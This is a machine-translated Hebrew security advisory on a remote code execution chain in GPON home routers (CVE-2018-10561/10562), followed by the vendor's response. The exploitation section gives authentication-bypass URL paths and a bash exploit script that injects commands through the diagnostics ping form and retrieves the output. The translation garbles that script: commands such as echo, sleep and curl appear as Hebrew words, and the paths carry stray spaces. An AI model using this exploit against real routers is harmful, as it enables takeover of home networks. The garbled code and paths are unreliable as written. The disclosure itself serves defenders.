פגיעות קריטית RCE נמצאה ביותר ממיליון נתבים ביתיים של GPON


שני עדכונים חשובים מאז פרסום הדוח:

  1. צוות המחקר שלנו יצר תיקון שיכול לעזור למשתמשים שהושפעו. אנא בדוק את זה כאן
  2. DASAN Zhone Solutions שלחה לנו את התגובה שלהם לדו"ח. אנו מצמידים אותו "כמו שהוא" בסוף דף זה

סקירה כללית:

ערכנו הערכה מקיפה על מספר נתבים ביתיים של GPON. נתבים רבים כיום משתמשים באינטרנט GPON ו- מצאנו דרך לעקוף את כל האימות במכשירים (CVE-2018-10561). עוקף אימות זה, הצלחנו לחשוף פגיעות נוספת בהזרקת פקודה (CVE-2018-10562) ולבצע פקודות במכשיר.

ניצול:

במהלך הניתוח שלנו על חברות קושחי GPON, מצאנו שתי פגיעויות קריטיות שונות (CVE-2018-10561 & CVE-2018-10562) שיכול, בשילוב, לאפשר שליטה מלאה במכשיר ולכן ברשת. הפגיעות הראשונה מנצלת את מנגנון האימות של המכשיר שיש בו פגם. פגם זה מאפשר לכל תוקף לעקוף את כל האימות.

ניתן למצוא את הפגם בשרתי HTTP, הבודקים אם יש נתיבים ספציפיים בעת אימות. זה מאפשר לתוקף לעקוף אימות בכל נקודת קצה באמצעות טריק פשוט.

על ידי הוספת תמונות / לכתובת האתר, התוקף יכול לעקוף את נקודת הקצה.

זה עובד בשני דפי HTML וגם ב- GponForm /

למשל על ידי הוספת

/menu.html?images/
או
/ GponForm / diag_FORM? תמונות /

אנו יכולים לנהל את המכשיר.

תוך כדי התבוננות בפונקציונליות המכשיר, שמנו לב שנקודת הקצה האבחנתית מכילה את פקודות הפינג והעקבות. לא נדרש הרבה כדי להבין שניתן להזרים את הפקודות על ידי הפרמטר המארח.

מכיוון שהנתב שומר תוצאות ping ב- / tmp ומשדר אותם למשתמש כשהמשתמש מבקר /diag.html, די פשוט לבצע פקודות ולהחזיר את הפלט שלהם עם פגיעות עקיפת האימות..

אנו כוללים את הגירסה הבאה של קוד הניצול הבא:
#! / bin / bash

הד "[+] שולח את הפקודה ..."
# אנו שולחים את הפקודות עם שני מצבי backtick (`) ונקודה-פסיק (;) מכיוון שדגמים שונים מפעילים התקנים שונים
curl -k -d “XWebPageName = diag&diag_action = פינג&wan_conlist = 0&dest_host = \ `$ 2 \`; $ 2&ipv = 0 ”$ 1 / GponForm / diag_Form? images / 2>/ dev / null 1>/ dev / null
הד "[+] מחכה ...."
לישון 3
הד "[+] אחזור ההפעלה ...."
סלסול -ק $ 1 / diag.html? תמונות / 2>/ dev / null | grep ‘diag_result =‘ | sed -e 's / \\ n / \ n / g'

השפעה:

GPON הוא סוג של רשת אופטית פסיבית המשתמשת בסיבים אופטיים והיא פופולרית במיוחד. כאשר אנשים משתמשים ב- GPON, הנתבים מסופקים על ידי ספקי שירותי אינטרנט. בסרטון תוכלו לראות זאת למעלה ממיליון אנשים משתמשים בנתב מערכת רשת זה.

בדקנו פגיעות זו על נתבי GPON אקראיים רבים, ו הפגיעות נמצאה בכולם. מכיוון שאנשים כה רבים משתמשים בנתבים מסוגים אלה, פגיעות זו עלולה לגרום לפשרה שלמה ברשת.

המלצות:

  1. בדוק אם הנתב שלך משתמש ברשת GPON.
  2. שימו לב שניתן לנתק ולנצל נתבי GPON.
  3. שוחח עם ספק האינטרנט שלך כדי לראות מה הם יכולים לעשות כדי לתקן את הבאג.
  4. הזהירו את חבריך בפייסבוק (לחצו כאן לשיתוף) וטוויטר (לחצו כאן לציוץ).

עדכון: הצהרה מ- DZS לגבי ניצול עוקף אימות

DASAN Zhone Solutions, Inc. בחנה דיווחי מדיה אחרונים כי התקני ממשק רשת DZS GPON מסוימים (NID), הידועים יותר כנתבים, עשויים להיות חשופים לניצול עוקף אימות..

DZS קבעה כי סדרת ZNID-GPON-25xx וספקי GPON ONT מסוימים של H640series, כאשר הם פועלים על גרסאות תוכנה ספציפיות, מושפעים מפגיעות זו. ל- DZS עד כה לא דווח על שום השפעת שירות מפגיעות זו. לאחר חקירה פנימית, קבענו שההשפעה הפוטנציאלית מוגבלת בהיקפה בהרבה ממה שדווח על ידי vpnMentor. על פי רשומות המכירה של DZS, בשילוב עם נתוני שדה שנאספו עד כה, הערכנו כי מספר יחידות ה- GPON ONT שעשויות להיות פוטנציאלית השפעה להיות פחות מ -240,000. בנוסף, בהתחשב בבשלות היחסית של המוצרים במחזור החיים שלהם, אנו חושבים שההשפעה מוגבלת לפחות מכשירים אפילו יותר.

היסטוריית מוצרים

DZS ZNID-GPON-25xx ו- ONTs מסוימים מסדרת H640, כולל התוכנה שהציגה פגיעות זו, פותחו על ידי ספק OEM ונמכרו מחדש על ידי DZS. רוב המוצרים הללו עוצבו ושוחררו לפני יותר מ -9 שנים, ועברו כבר הרבה מחיי השירות בר-קיימא שלהם. מכיוון שכבר לא מוצעים חוזי תמיכה בתוכנה עבור מרבית המוצרים הללו, אין לנו תובנה ישירה למספר הכולל של יחידות שעדיין משתמשים בהן באופן פעיל בתחום..

פתרון הבעיה

DZS הודיעה לכל הלקוחות שרכשו דגמים אלה על הפגיעות. אנו עובדים עם כל לקוח כדי לעזור לו להעריך שיטות לטפל בבעיה עבור יחידות שעשויות להיות מותקנות בשדה. על פי שיקול דעתו של כל לקוח להחליט כיצד לטפל בתנאי לציוד הפרוס שלהם.

המשימה של DZS היא להבטיח שכל הפתרונות שלה עומדים בתקני האבטחה הגבוהים ביותר בענף. אנו מחבקים זאת וכל הזדמנות לבחון ולשפר ברציפות את מתודולוגיות תכנון ובדיקת האבטחה שלנו.

Brayan Jackson
Brayan Jackson Administrator
Sorry! The Author has not filled his profile.
follow me